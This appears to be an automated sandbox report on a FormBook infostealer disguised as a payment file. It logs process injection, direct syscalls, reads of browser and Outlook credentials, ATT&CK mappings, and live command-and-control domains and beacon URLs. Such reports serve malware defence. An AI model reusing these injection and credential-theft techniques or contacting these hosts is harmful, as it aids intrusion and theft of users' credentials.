            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exeNtWriteVirtualMemory: Direct from: 0x77218B2CJump to behavior
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exeNtSetInformationProcess: Direct from: 0x77216D8CJump to behavior
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exeNtOpenKeyEx: Direct from: 0x77217E5CJump to behavior
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exeNtUnmapViewOfSection: Direct from: 0x77216E6CJump to behavior
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exeNtQueryVolumeInformationFile: Direct from: 0x7721705CJump to behavior
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exeNtQueryInformationToken: Direct from: 0x77216DDCJump to behavior
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exeNtCreateFile: Direct from: 0x7721711CJump to behavior
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exeNtOpenFile: Direct from: 0x77216EFCJump to behavior
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exeNtCreateKey: Direct from: 0x77216D9CJump to behavior
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exeNtClose: Direct from: 0x77216C9C
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exeNtResumeThread: Direct from: 0x772170ECJump to behavior
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exeNtOpenSection: Direct from: 0x77216F3CJump to behavior
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exeNtQueryValueKey: Direct from: 0x77216D1CJump to behavior
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exeNtDeviceIoControlFile: Direct from: 0x77216C1CJump to behavior
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exeNtQueryAttributesFile: Direct from: 0x77216F9CJump to behavior
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exeNtSetInformationThread: Direct from: 0x77216C7CJump to behavior
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exeNtProtectVirtualMemory: Direct from: 0x772170CCJump to behavior
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exeNtQuerySystemInformation: Direct from: 0x77218AECJump to behavior
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exeNtProtectVirtualMemory: Direct from: 0x7720C09FJump to behavior
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exeNtQuerySystemInformation: Direct from: 0x77216F2CJump to behavior
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exeNtSetInformationThread: Direct from: 0x771FE6F9Jump to behavior
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exeNtCreateUserProcess: Direct from: 0x772178BCJump to behavior
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exeNtDelayExecution: Direct from: 0x77216F0CJump to behavior
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exeNtOpenKeyEx: Direct from: 0x77216CCCJump to behavior
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exeNtQueryInformationProcess: Direct from: 0x77216D56Jump to behavior
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exeNtNotifyChangeKey: Direct from: 0x77217DDCJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\Payment Copy #190922-001.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\xwizard.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: NULL target: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: NULL target: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\xwizard.exeThread register set: target process: 6060Jump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\Payment Copy #190922-001.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 259E008Jump to behavior
            Source: C:\Users\user\Desktop\Payment Copy #190922-001.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Payment Copy #190922-001.exe"Jump to behavior
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exeProcess created: C:\Windows\SysWOW64\xwizard.exe "C:\Windows\SysWOW64\xwizard.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: Payment Copy #190922-001.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: gXhpelxbquSwSp.exe, 0000000E.00000000.11596998095.0000000001900000.00000002.00000001.00040000.00000000.sdmp, gXhpelxbquSwSp.exe, 0000000E.00000002.12536551964.0000000001900000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: gXhpelxbquSwSp.exe, 0000000E.00000000.11596998095.0000000001900000.00000002.00000001.00040000.00000000.sdmp, gXhpelxbquSwSp.exe, 0000000E.00000002.12536551964.0000000001900000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager&%
            Source: gXhpelxbquSwSp.exe, 0000000E.00000000.11596998095.0000000001900000.00000002.00000001.00040000.00000000.sdmp, gXhpelxbquSwSp.exe, 0000000E.00000002.12536551964.0000000001900000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000004.00000002.11673757784.0000000002670000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.12535665138.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.12536862831.0000000002F50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.11674260737.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.12537425982.0000000003AE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.12536524767.00000000044A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.12536605737.00000000044F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.11674681590.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\xwizard.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\xwizard.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000004.00000002.11673757784.0000000002670000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.12535665138.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.12536862831.0000000002F50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.11674260737.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.12537425982.0000000003AE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.12536524767.00000000044A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.12536605737.00000000044F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.11674681590.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading            		312
            Process Injection            		2
            Virtualization/Sandbox Evasion            		1
            OS Credential Dumping            		111
            Security Software Discovery            		Remote Services1
            Email Collection            		3
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism            		312
            Process Injection            		LSASS Memory2
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol1
            Data from Local System            		4
            Non-Application Layer Protocol            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            Process Discovery            		SMB/Windows Admin SharesData from Network Shared Drive4
            Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            DLL Side-Loading            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1574653 Sample: Payment Copy #190922-001.exe Startdate: 13/12/2024 Architecture: WINDOWS Score: 100 31 www.y6h6kn.top 2->31 33 www.telepzow.fit 2->33 35 7 other IPs or domains 2->35 39 Suricata IDS alerts for network traffic 2->39 41 Antivirus detection for URL or domain 2->41 43 Multi AV Scanner detection for submitted file 2->43 45 7 other signatures 2->45 10 Payment Copy #190922-001.exe 2 2->10         started        signatures3 process4 signatures5 55 Binary is likely a compiled AutoIt script file 10->55 57 Writes to foreign memory regions 10->57 59 Maps a DLL or memory area into another process 10->59 13 svchost.exe 10->13         started        process6 signatures7 61 Maps a DLL or memory area into another process 13->61 16 gXhpelxbquSwSp.exe 13->16 injected process8 dnsIp9 25 thesnusgang.fun 84.32.84.32, 49781, 49785, 49786 NTT-LT-ASLT Lithuania 16->25 27 www.y6h6kn.top 103.23.149.28, 49777, 80 DIGINET-AS-VNDigitaltelecomminicationservicejointstock unknown 16->27 29 2 other IPs or domains 16->29 37 Found direct / indirect Syscall (likely to bypass EDR) 16->37 20 xwizard.exe 13 16->20         started        signatures10 process11 signatures12 47 Tries to steal Mail credentials (via file / registry access) 20->47 49 Tries to harvest and steal browser information (history, passwords, etc) 20->49 51 Modifies the context of a thread in another process (thread injection) 20->51 53 2 other signatures 20->53 23 firefox.exe 20->23         started        process13

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Payment Copy #190922-001.exe37%ReversingLabsWin32.Trojan.AutoitInject
            Payment Copy #190922-001.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.deadshoy.tech0%Avira URL Cloudsafe
            http://www.telepzow.fit/oizn/100%Avira URL Cloudphishing
            https://autoitscript.compb_rtb_ev_partv200%Avira URL Cloudsafe
            http://www.y6h6kn.top/jv64/?BTV4RR_=0rgj4Y9sgnjazUN/4YnNawpmVeS/0BjNZTVEPCZk5UU8x8xERo30l5aFjW3xVEpqAaMpb+WWzoUct0TX0HY7w9E5vaK255EpQhtC5dNFByAd90Z0uMBeXk0=&Tr=F0udvf0%Avira URL Cloudsafe
            https://google.comVISITOR_INFO1_LIVE/0%Avira URL Cloudsafe
            http://www.dnft.immo/yeky/?BTV4RR_=7P22LBHaa1jf6nBK2o2gS6XOG6oCOldtUQ790N9gWu5M59Q4JmwGsTkf7hc1wA5HSyz6dzInvvSoc7txVpadAxG5YrQIOX9iVafYKH1JxvTLehj3THGuTlQ=&Tr=F0udvf0%Avira URL Cloudsafe
            https://autoitscript.comVPv200%Avira URL Cloudsafe
            http://www.thesnusgang.fun/z4qr/0%Avira URL Cloudsafe
            https://google.comVISITOR_PRIVACY_METADATA/0%Avira URL Cloudsafe
            https://autoitscript.compb_rtb_ev_part/0%Avira URL Cloudsafe
            http://www.thesnusgang.fun/z4qr/?BTV4RR_=1ZZgvIaiKHhduep9Gr9CVWvOgHRqyUfEbyT18lbVckKL7Qn23DKNX9UGqbKheWGJWb8pgnQ+8NB/9Zi1y/4jvQKbXYzZtls87cfJZx+dUoFHR2K38281rgo=&Tr=F0udvf0%Avira URL Cloudsafe
            http://www.deadshoy.tech/0sq9/0%Avira URL Cloudsafe
            http://www.deadshoy.tech/0sq9/?BTV4RR_=wDssjmzaov4c9lpE8JDB5V0DqfSXJcjPXluydM4tZUUyV1Bm9QX9sM5KRNX6VfgW0wIXfg38PryhAP572OSdzFODF7KjQZum5G+6I0N94vKpqL+/svKTI9o=&Tr=F0udvf0%Avira URL Cloudsafe
            https://autoitscript.comVP/0%Avira URL Cloudsafe
            http://www.telepzow.fit/oizn/?BTV4RR_=uQjrwkUUEo9A4dlTBtchalk/X9854Zb0afRbN7eAn79tTht6fIX+AVk9Vz6pdINH1MMl3rmaK9mEFEBfLFOrRCQBiEGwcQ2q95PqYDbv0Ge51W4VvJEvInw=&Tr=F0udvf100%Avira URL Cloudphishing
            https://google.comVISITOR_INFO1_LIVEv200%Avira URL Cloudsafe
            https://google.comVISITOR_PRIVACY_METADATAv20ue0%Avira URL Cloudsafe
            http://www.dnft.immo/yeky/0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.y6h6kn.top
            		103.23.149.28
            		truetrue
              		unknown
              94950.bodis.com
              		199.59.243.227
              		truefalse
                		high
                www.deadshoy.tech
                		199.59.243.227
                		truetrue
                  		unknown
                  www.telepzow.fit
                  		172.67.155.214
                  		truetrue
                    		unknown
                    thesnusgang.fun
                    		84.32.84.32
                    		truetrue
                      		unknown
                      www.thesnusgang.fun
                      		unknown
                      		unknownfalse
                        		unknown
                        www.dnft.immo
                        		unknown
                        		unknownfalse
                          		unknown
                          srtb.msn.com
                          		unknown
                          		unknownfalse
                            		high

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://www.telepzow.fit/oizn/true
                            • Avira URL Cloud: phishing
                            		unknown
                            http://www.y6h6kn.top/jv64/?BTV4RR_=0rgj4Y9sgnjazUN/4YnNawpmVeS/0BjNZTVEPCZk5UU8x8xERo30l5aFjW3xVEpqAaMpb+WWzoUct0TX0HY7w9E5vaK255EpQhtC5dNFByAd90Z0uMBeXk0=&Tr=F0udvftrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.thesnusgang.fun/z4qr/true
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.dnft.immo/yeky/?BTV4RR_=7P22LBHaa1jf6nBK2o2gS6XOG6oCOldtUQ790N9gWu5M59Q4JmwGsTkf7hc1wA5HSyz6dzInvvSoc7txVpadAxG5YrQIOX9iVafYKH1JxvTLehj3THGuTlQ=&Tr=F0udvftrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.thesnusgang.fun/z4qr/?BTV4RR_=1ZZgvIaiKHhduep9Gr9CVWvOgHRqyUfEbyT18lbVckKL7Qn23DKNX9UGqbKheWGJWb8pgnQ+8NB/9Zi1y/4jvQKbXYzZtls87cfJZx+dUoFHR2K38281rgo=&Tr=F0udvftrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.telepzow.fit/oizn/?BTV4RR_=uQjrwkUUEo9A4dlTBtchalk/X9854Zb0afRbN7eAn79tTht6fIX+AVk9Vz6pdINH1MMl3rmaK9mEFEBfLFOrRCQBiEGwcQ2q95PqYDbv0Ge51W4VvJEvInw=&Tr=F0udvftrue
                            • Avira URL Cloud: phishing
                            		unknown
                            http://www.deadshoy.tech/0sq9/true
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.deadshoy.tech/0sq9/?BTV4RR_=wDssjmzaov4c9lpE8JDB5V0DqfSXJcjPXluydM4tZUUyV1Bm9QX9sM5KRNX6VfgW0wIXfg38PryhAP572OSdzFODF7KjQZum5G+6I0N94vKpqL+/svKTI9o=&Tr=F0udvftrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.dnft.immo/yeky/true
                            • Avira URL Cloud: safe
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://www.deadshoy.techgXhpelxbquSwSp.exe, 0000000E.00000002.12536862831.0000000002FCE000.00000040.80000000.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://duckduckgo.com/chrome_newtabxwizard.exe, 0000000F.00000002.12540443456.0000000007AF7000.00000004.00000020.00020000.00000000.sdmp, X0a-0531.15.drfalse
                              		high
                              https://duckduckgo.com/ac/?q=xwizard.exe, 0000000F.00000002.12540443456.0000000007AF7000.00000004.00000020.00020000.00000000.sdmp, X0a-0531.15.drfalse
                                		high
                                https://fpt.live.com/session_id=f79511e86c1f4ab69498b2fb7f2923a5&CustomerId=33e01921-4d64-4f8c-a055-xwizard.exe, 0000000F.00000002.12535879368.0000000000A22000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoxwizard.exe, 0000000F.00000002.12540443456.0000000007AF7000.00000004.00000020.00020000.00000000.sdmp, X0a-0531.15.drfalse
                                    		high
                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=xwizard.exe, 0000000F.00000002.12540443456.0000000007AF7000.00000004.00000020.00020000.00000000.sdmp, X0a-0531.15.drfalse
                                      		high
                                      https://ac.ecosia.org?q=X0a-0531.15.drfalse
                                        		high
                                        https://google.comVISITOR_PRIVACY_METADATA/xwizard.exe, 0000000F.00000003.11844411815.0000000000A9B000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=xwizard.exe, 0000000F.00000002.12540443456.0000000007AF7000.00000004.00000020.00020000.00000000.sdmp, X0a-0531.15.drfalse
                                          		high
                                          https://google.comVISITOR_INFO1_LIVE/xwizard.exe, 0000000F.00000003.11844411815.0000000000A9B000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://autoitscript.compb_rtb_ev_partv20xwizard.exe, 0000000F.00000003.11844411815.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12535879368.0000000000AAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.ecosia.org/newtab/X0a-0531.15.drfalse
                                            		high
                                            https://autoitscript.comVPv20xwizard.exe, 0000000F.00000003.11844411815.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12535879368.0000000000AAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://autoitscript.compb_rtb_ev_part/xwizard.exe, 0000000F.00000003.11844411815.0000000000A9B000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.google.comgXhpelxbquSwSp.exe, 0000000E.00000002.12546623184.0000000006B1C000.00000004.80000000.00040000.00000000.sdmp, gXhpelxbquSwSp.exe, 0000000E.00000002.12546623184.000000000698A000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12537476710.00000000056FA000.00000004.10000000.00040000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12537476710.000000000588C000.00000004.10000000.00040000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12540120301.0000000007830000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://autoitscript.comVP/xwizard.exe, 0000000F.00000003.11844411815.0000000000A9B000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://google.comVISITOR_PRIVACY_METADATAv20uexwizard.exe, 0000000F.00000003.11844411815.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12535879368.0000000000AAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchxwizard.exe, 0000000F.00000002.12540443456.0000000007AF7000.00000004.00000020.00020000.00000000.sdmp, X0a-0531.15.drfalse
                                                		high
                                                https://google.comVISITOR_INFO1_LIVEv20xwizard.exe, 0000000F.00000003.11844411815.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12535879368.0000000000AAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=X0a-0531.15.drfalse
                                                  		high
                                                  https://gemini.google.com/app?q=X0a-0531.15.drfalse
                                                    		high

                                                    World Map of Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public IPs

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    103.23.149.28
                                                    		www.y6h6kn.topunknown
                                                    		131349DIGINET-AS-VNDigitaltelecomminicationservicejointstocktrue
                                                    172.67.155.214
                                                    		www.telepzow.fitUnited States
                                                    		13335CLOUDFLARENETUStrue
                                                    199.59.243.227
                                                    		94950.bodis.comUnited States
                                                    		395082BODIS-NJUSfalse
                                                    84.32.84.32
                                                    		thesnusgang.funLithuania
                                                    		33922NTT-LT-ASLTtrue

                                                    General Information

                                                    Joe Sandbox version:41.0.0 Charoite
                                                    Analysis ID:1574653
                                                    Start date and time:2024-12-13 13:16:21 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 5m 12s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
                                                    Run name:Potential for more IOCs and behavior
                                                    Number of analysed new started processes analysed:32
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:1
                                                    Technologies:
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:Payment Copy #190922-001.exe
                                                    Detection:MAL
                                                    Classification:mal100.troj.spyw.evad.winEXE@7/3@7/4
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe

                                                    Warnings

                                                    • Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, SIHClient.exe, appidcertstorecheck.exe, conhost.exe, backgroundTaskHost.exe
                                                    • Excluded IPs from analysis (whitelisted): 204.79.197.203, 23.44.201.36, 4.175.87.197, 20.150.78.196, 20.190.177.149
                                                    • Excluded domains from analysis (whitelisted): www.bing.com, assets.msn.com, chrome.cloudflare-dns.com, client.wns.windows.com, slscr.update.microsoft.com, a-0003.a-msedge.net, ctldl.windowsupdate.com, www-msn-com.a-0003.a-msedge.net, cxcs.microsoft.net, aefd.nelreports.net, weathermapdata.blob.core.windows.net, x1.c.lencr.org, login.live.com, th.bing.com, c.pki.goog
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • VT rate limit hit for: Payment Copy #190922-001.exe

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    07:18:33API Interceptor507903x Sleep call for process: xwizard.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

